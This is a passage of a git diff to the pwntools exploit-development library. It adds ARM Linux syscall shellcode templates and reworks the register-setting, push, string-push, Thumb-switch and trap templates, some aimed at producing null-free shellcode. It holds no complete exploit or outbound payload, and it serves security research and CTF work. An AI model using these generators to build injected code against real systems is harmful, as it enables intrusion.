stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/arm/linux/stty.asm b/pwnlib/shellcraft/templates/arm/linux/stty.asm new file mode 100644 index 000000000..fc02b7d2c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/arm/linux/symlink.asm b/pwnlib/shellcraft/templates/arm/linux/symlink.asm new file mode 100644 index 000000000..ddc46414f --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/arm/linux/symlinkat.asm b/pwnlib/shellcraft/templates/arm/linux/symlinkat.asm new file mode 100644 index 000000000..2ea59f0d5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sync.asm b/pwnlib/shellcraft/templates/arm/linux/sync.asm new file mode 100644 index 000000000..76d48cbc5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/arm/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/arm/linux/sync_file_range.asm new file mode 100644 index 000000000..5ec0b1232 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/syscall.asm b/pwnlib/shellcraft/templates/arm/linux/syscall.asm index d21ca178d..9971f96d4 100644 --- a/pwnlib/shellcraft/templates/arm/linux/syscall.asm +++ b/pwnlib/shellcraft/templates/arm/linux/syscall.asm @@ -1,9 +1,8 @@ <% from pwnlib.shellcraft import arm - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context + from pwnlib.constants import eval + from pwnlib.abi import linux_arm_syscall as abi %> - - <%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None, arg6 = None"/> <%docstring> Args: [syscall_number, \*args] @@ -15,23 +14,17 @@ Example: >>> print shellcraft.arm.linux.syscall(11, 1, 'sp', 2, 0).rstrip() /* call syscall(11, 1, 'sp', 2, 0) */ - /* Set r0 = 1 = 0x1 */ - mov r0, #1 - mov r1, sp - /* Set r2 = 2 = 0x2 */ - mov r2, #2 - /* Set r3 = 0 = 0x0 */ - eor r3, r3 - /* Set r7 = 11 = 0xb */ - mov r7, #11 - swi #0 + mov r0, #1 + mov r1, sp + mov r2, #2 + eor r3, r3 /* 0 (#0) */ + mov r7, #0xb + svc 0 >>> print shellcraft.arm.linux.syscall('SYS_exit', 0).rstrip() /* call exit(0) */ - /* Set r0 = 0 = 0x0 */ - eor r0, r0 - /* Set r7 = (SYS_exit) = 0x1 */ - mov r7, #(SYS_exit) - swi #0 + eor r0, r0 /* 0 (#0) */ + mov r7, #(SYS_exit) /* 1 */ + svc 0 <% if isinstance(syscall, (str, unicode)) and syscall.startswith('SYS_'): @@ -52,11 +45,13 @@ Example: while args and args[-1] == '?': args.pop() syscall_repr = syscall_repr % ', '.join(args) + + registers = abi.register_arguments + arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5] + regctx = dict(zip(registers, arguments)) %>\ /* call ${syscall_repr} */ -% for dst, src in zip(['r0', 'r1', 'r2', 'r3', 'r4', 'r5', 'r6', 'r7'], [arg0, arg1, arg2, arg3, arg4, arg5, arg6, syscall]): - % if src != None: - ${arm.mov(dst, src)} - % endif -% endfor - swi #0 +%if any(arguments): + ${arm.setregs(regctx)} +%endif + svc 0 diff --git a/pwnlib/shellcraft/templates/arm/linux/syslog.asm b/pwnlib/shellcraft/templates/arm/linux/syslog.asm new file mode 100644 index 000000000..1b745a1ed --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/syslog.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/tee.asm b/pwnlib/shellcraft/templates/arm/linux/tee.asm new file mode 100644 index 000000000..895580911 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/time.asm b/pwnlib/shellcraft/templates/arm/linux/time.asm new file mode 100644 index 000000000..b6d060694 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/arm/linux/timer_create.asm b/pwnlib/shellcraft/templates/arm/linux/timer_create.asm new file mode 100644 index 000000000..c8b8e5321 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/timer_delete.asm b/pwnlib/shellcraft/templates/arm/linux/timer_delete.asm new file mode 100644 index 000000000..dc9dfe94b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/timer_delete.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/arm/linux/timer_getoverrun.asm new file mode 100644 index 000000000..4a33c47b6 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/arm/linux/timer_gettime.asm new file mode 100644 index 000000000..a9f065766 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/arm/linux/timer_settime.asm b/pwnlib/shellcraft/templates/arm/linux/timer_settime.asm new file mode 100644 index 000000000..1e11d868c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/timer_settime.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/arm/linux/truncate.asm b/pwnlib/shellcraft/templates/arm/linux/truncate.asm new file mode 100644 index 000000000..e36e1ef59 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/arm/linux/truncate64.asm b/pwnlib/shellcraft/templates/arm/linux/truncate64.asm new file mode 100644 index 000000000..6c9692011 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ulimit.asm b/pwnlib/shellcraft/templates/arm/linux/ulimit.asm new file mode 100644 index 000000000..2e6e807a9 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ulimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/umask.asm b/pwnlib/shellcraft/templates/arm/linux/umask.asm new file mode 100644 index 000000000..0e4489a64 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/arm/linux/uname.asm b/pwnlib/shellcraft/templates/arm/linux/uname.asm new file mode 100644 index 000000000..4164dcddf --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/arm/linux/unlink.asm b/pwnlib/shellcraft/templates/arm/linux/unlink.asm new file mode 100644 index 000000000..243f385a7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/arm/linux/unlinkat.asm b/pwnlib/shellcraft/templates/arm/linux/unlinkat.asm new file mode 100644 index 000000000..6f2786581 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/unlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/arm/linux/unshare.asm b/pwnlib/shellcraft/templates/arm/linux/unshare.asm new file mode 100644 index 000000000..fe1f9f569 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ustat.asm b/pwnlib/shellcraft/templates/arm/linux/ustat.asm new file mode 100644 index 000000000..674437633 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/utime.asm b/pwnlib/shellcraft/templates/arm/linux/utime.asm new file mode 100644 index 000000000..733b74e66 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} diff --git a/pwnlib/shellcraft/templates/arm/linux/utimensat.asm b/pwnlib/shellcraft/templates/arm/linux/utimensat.asm new file mode 100644 index 000000000..54ce8198c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/utimes.asm b/pwnlib/shellcraft/templates/arm/linux/utimes.asm new file mode 100644 index 000000000..6311db7ea --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/vfork.asm b/pwnlib/shellcraft/templates/arm/linux/vfork.asm new file mode 100644 index 000000000..03182ed35 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/arm/linux/vhangup.asm b/pwnlib/shellcraft/templates/arm/linux/vhangup.asm new file mode 100644 index 000000000..64aaf7481 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/vhangup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/arm/linux/vmsplice.asm b/pwnlib/shellcraft/templates/arm/linux/vmsplice.asm new file mode 100644 index 000000000..6a5f0c967 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/wait4.asm b/pwnlib/shellcraft/templates/arm/linux/wait4.asm new file mode 100644 index 000000000..ac37dae67 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/arm/linux/waitid.asm b/pwnlib/shellcraft/templates/arm/linux/waitid.asm new file mode 100644 index 000000000..9eb880b23 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/waitid.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/arm/linux/waitpid.asm b/pwnlib/shellcraft/templates/arm/linux/waitpid.asm new file mode 100644 index 000000000..b30ef692d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/arm/linux/write.asm b/pwnlib/shellcraft/templates/arm/linux/write.asm new file mode 100644 index 000000000..ea20a35a3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/write.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf, n"/> +<%docstring> +Invokes the syscall write. See 'man 2 write' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + + + ${syscall('SYS_write', fd, buf, n)} diff --git a/pwnlib/shellcraft/templates/arm/linux/writev.asm b/pwnlib/shellcraft/templates/arm/linux/writev.asm new file mode 100644 index 000000000..4a81d9e1c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/writev.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/arm/memcpy.asm b/pwnlib/shellcraft/templates/arm/memcpy.asm new file mode 100644 index 000000000..8c4b2d877 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/memcpy.asm @@ -0,0 +1,19 @@ +<% from pwnlib.shellcraft import arm, pretty, common %> +<%docstring>Copies memory. + +Args: + dest: Destination address + src: Source address + n: Number of bytes + +<%page args="dest, src, n"/> +<% +memcpy_loop = common.label("memcpy_loop") +%> + /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ + ${arm.setregs({'r0': dest, 'r1': src, 'r2': n})} +${memcpy_loop}: + ldrb r3, [r1], #1 + strb r3, [r0], #1 + subs r2, r2, #1 + bge ${memcpy_loop} diff --git a/pwnlib/shellcraft/templates/arm/mov.asm b/pwnlib/shellcraft/templates/arm/mov.asm index 765b5bcf7..ee812988b 100644 --- a/pwnlib/shellcraft/templates/arm/mov.asm +++ b/pwnlib/shellcraft/templates/arm/mov.asm @@ -1,10 +1,9 @@ <% - from pwnlib.shellcraft import common - from pwnlib import constants - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context + from pwnlib.shellcraft import common, eval, pretty, okay + from pwnlib.constants import Constant from pwnlib.log import getLogger from pwnlib.shellcraft.registers import arm as regs - from pwnlib.util.fiddling import negate, bnot + from pwnlib.util import fiddling log = getLogger('pwnlib.shellcraft.arm.mov') %> <%page args="dst, src"/> @@ -21,40 +20,90 @@ on the value of `context.os`. Examples: >>> print shellcraft.arm.mov('r0','r1').rstrip() - mov r0, r1 + mov r0, r1 >>> print shellcraft.arm.mov('r0', 5).rstrip() - /* Set r0 = 5 = 0x5 */ - mov r0, #5 + mov r0, #5 >>> print shellcraft.arm.mov('r0', 0x34532).rstrip() - /* Set r0 = 214322 = 0x34532 */ - movw r0, #17714 - movt r0, #3 + movw r0, #0x34532 & 0xffff + movt r0, #0x34532 >> 16 + >>> print shellcraft.arm.mov('r0', 0x101).rstrip() + movw r0, #0x101 + >>> print shellcraft.arm.mov('r0', 0xff << 14).rstrip() + mov r0, #0x3fc000 + >>> print shellcraft.arm.mov('r0', 0xff << 15).rstrip() + movw r0, #0x7f8000 & 0xffff + movt r0, #0x7f8000 >> 16 + >>> print shellcraft.arm.mov('r0', 0xf00d0000).rstrip() + eor r0, r0 + movt r0, #0xf00d0000 >> 16 + >>> print shellcraft.arm.mov('r0', 0xffff00ff).rstrip() + mvn r0, #(0xffff00ff ^ (-1)) + >>> print shellcraft.arm.mov('r0', 0x1fffffff).rstrip() + mvn r0, #(0x1fffffff ^ (-1)) Args: - dest (str): The destination register. + dest (str): ke destination register. src (str): Either the input register, or an immediate value. <% if not dst in regs: log.error('%r is not a register' % str(dst)) + +# ARM has a mov-const-with-shift +# As long as the const fits in 8 bits, everything works out :) +def get_imm8_shift_ok(v): + v_bits = fiddling.bits(v) + retval = 0 + + if v == 0: + return 1 + + trailing_zeroes = v_bits[::-1].index(1) + leading_zeroes = v_bits.index(1) + width = len(v_bits) - leading_zeroes - trailing_zeroes + + if width > 8: + return 0 + + retval = v >> trailing_zeroes + + if width > 8 \ + or not okay(retval, bits=8) \ + or (width == 8 and 0 != (trailing_zeroes % 2)): + return 0 + + return retval + if not src in regs: - with ctx.local(arch = 'arm'): - src = constants.eval(src) + src = eval(src) + srcu = src & 0xffffffff + srcn = fiddling.negate(src + 1) + positive_imm8_shift = get_imm8_shift_ok(srcu) + negative_imm8_shift = get_imm8_shift_ok(srcn) %> -%if not isinstance(src, (int, long)): - mov ${dst}, ${src} +%if src == dst: + /* mov ${dst}, ${src} */ +%elif not isinstance(src, (int, long)): + mov ${dst}, ${src} %else: - /* Set ${dst} = ${src} = 0x${'%x' % src} */ - %if src == 0: - eor ${dst}, ${dst} - %elif src & 0xffff0000 == 0: - mov ${dst}, #${src} - %elif src & 0xffffff00 == 0xffffff00: - mvn ${dst}, #${bnot(src) & 0xff} - %else: - movw ${dst}, #${src & 0xffff} - movt ${dst}, #${src >> 16} - %endif + %if src == 0: + eor ${dst}, ${dst} /* ${src} (${'#%x' % src}) */ + %elif positive_imm8_shift: + mov ${dst}, #${pretty(src)} + %elif src & 0x0000ffff == src: + movw ${dst}, #${pretty(src)} + %elif negative_imm8_shift: + mvn ${dst}, #(${pretty(src)} ^ (-1)) + %elif src > 0 and srcu & 0xffff0000 == src: + eor ${dst}, ${dst} + movt ${dst}, #${pretty(src)} >> 16 + %elif src > 0: + movw ${dst}, #${pretty(src)} & 0xffff + movt ${dst}, #${pretty(src)} >> 16 + %else: + movw ${dst}, #${pretty(src)} >> 00 & 0xffff + movt ${dst}, #${pretty(src)} >> 16 & 0xffff + %endif %endif diff --git a/pwnlib/shellcraft/templates/arm/push.asm b/pwnlib/shellcraft/templates/arm/push.asm index 49e652e67..873af29d3 100644 --- a/pwnlib/shellcraft/templates/arm/push.asm +++ b/pwnlib/shellcraft/templates/arm/push.asm @@ -1,16 +1,23 @@ <% from pwnlib import constants %> <% from pwnlib.util import lists, packing, fiddling %> <% from pwnlib.shellcraft.arm import mov %> -<%page args="word"/> +<%page args="word, register='r12'"/> <%docstring> -Pushes a 32-bit integer onto the stack. Uses R7 as a temporary register. +Pushes a 32-bit integer onto the stack. Uses r12 as a temporary register. + +r12 is defined as the inter-procedural scartch register ($ip), +so this should not interfere with most usage. Args: - word (int, str): The word to push + word (int, str): + The word to push + tmpreg (str): + Register to use as a temporary register. R7 is used by default. + -% if isinstance(word, int) and word < 0xffff: +% if isinstance(word, int) and 0 < word < 0xffff: push ${hex(word)} % else: - ${mov('r7',word)} - push {r7} + ${mov(register,word)} + push {${register}} % endif diff --git a/pwnlib/shellcraft/templates/arm/pushstr.asm b/pwnlib/shellcraft/templates/arm/pushstr.asm index d7cf94a6b..fb9b995d7 100644 --- a/pwnlib/shellcraft/templates/arm/pushstr.asm +++ b/pwnlib/shellcraft/templates/arm/pushstr.asm @@ -1,12 +1,25 @@ <% from pwnlib.util import lists, packing, fiddling %> <% from pwnlib.shellcraft.arm import push %> -<%page args="string, append_null = True"/> +<%page args="string, append_null = True, register='r7'"/> <%docstring> Pushes a string onto the stack. Args: - string (str): The string to push. - append_null (bool): Whether to append a single NULL-byte before pushing. + string (str): The string to push. + append_null (bool): Whether to append a single NULL-byte before pushing. + register (str): Temporary register to use. By default, R7 is used. + +Examples: + + >>> print shellcraft.arm.pushstr("Hello!").rstrip() + /* push 'Hello!\x00A' */ + movw r7, #0x4100216f & 0xffff + movt r7, #0x4100216f >> 16 + push {r7} + movw r7, #0x6c6c6548 & 0xffff + movt r7, #0x6c6c6548 >> 16 + push {r7} + <% if append_null: @@ -17,5 +30,5 @@ Args: %>\ /* push ${repr(string)} */ % for word in packing.unpack_many(string, 32)[::-1]: - ${push(word)} + ${push(word, register)} % endfor diff --git a/pwnlib/shellcraft/templates/arm/setregs.asm b/pwnlib/shellcraft/templates/arm/setregs.asm new file mode 100644 index 000000000..c6f3ed9d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/setregs.asm @@ -0,0 +1,43 @@ +<% + from pwnlib.regsort import regsort + from pwnlib.constants import Constant, eval + from pwnlib.shellcraft import registers + from pwnlib.shellcraft.arm import mov +%> +<%page args="reg_context, stack_allowed = True"/> +<%docstring> +Sets multiple registers, taking any register dependencies into account +(i.e., given eax=1,ebx=eax, set ebx first). + +Args: + reg_context (dict): Desired register context + stack_allowed (bool): Can the stack be used? + +Example: + + >>> print shellcraft.setregs({'r0':1, 'r2':'r3'}).rstrip() + mov r0, #1 + mov r2, r3 + >>> print shellcraft.setregs({'r0':'r1', 'r1':'r0', 'r2':'r3'}).rstrip() + mov r2, r3 + eor r0, r0, r1 /* xchg r0, r1 */ + eor r1, r0, r1 + eor r0, r0, r1 + +<% +reg_context = {k:v for k,v in reg_context.items() if v is not None} +sorted_regs = regsort(reg_context, registers.arm) +%> +% if not sorted_regs: + /* setregs noop */ +% else: +% for how, dst, src in regsort(reg_context, registers.arm): +% if how == 'xchg': + eor ${dst}, ${dst}, ${src} /* xchg ${dst}, ${src} */ + eor ${src}, ${dst}, ${src} + eor ${dst}, ${dst}, ${src} +% else: + ${mov(dst, src)} +% endif +% endfor +% endif diff --git a/pwnlib/shellcraft/templates/arm/to_thumb.asm b/pwnlib/shellcraft/templates/arm/to_thumb.asm index a4654cef3..f89179ce4 100644 --- a/pwnlib/shellcraft/templates/arm/to_thumb.asm +++ b/pwnlib/shellcraft/templates/arm/to_thumb.asm @@ -1,5 +1,21 @@ +<% + from random import choice + from pwnlib.shellcraft import registers +%> <%docstring>Go from ARM to THUMB mode. +<%page args="reg=None, avoid = []"/> +<% + if reg: + pass + elif not avoid or 'r3' not in avoid: + reg = 'r3' + else: + # Avoid registers we don't want to clobber, and r0 + # since it will encode a NULL. + avoid = set(avoid) | {'r0', 'sp', 'pc', 'cpsr', 'lr'} + reg = next(r for r in registers.arm if r not in avoid) +%> .arm - add r3, pc, #1 - bx r3 + add ${reg}, pc, #1 + bx ${reg} .thumb diff --git a/pwnlib/shellcraft/templates/arm/trap.asm b/pwnlib/shellcraft/templates/arm/trap.asm index d9c40dcf5..6783b0c21 100644 --- a/pwnlib/shellcraft/templates/arm/trap.asm +++ b/pwnlib/shellcraft/templates/arm/trap.asm @@ -1,2 +1,8 @@ <%docstring>A trap instruction. - BKPT + nop + nop + nop + mov r0, 12 + mov r1, sp + BKPT 0xab + B . diff --git a/pwnlib/shellcraft/templates/arm/udiv_10.asm 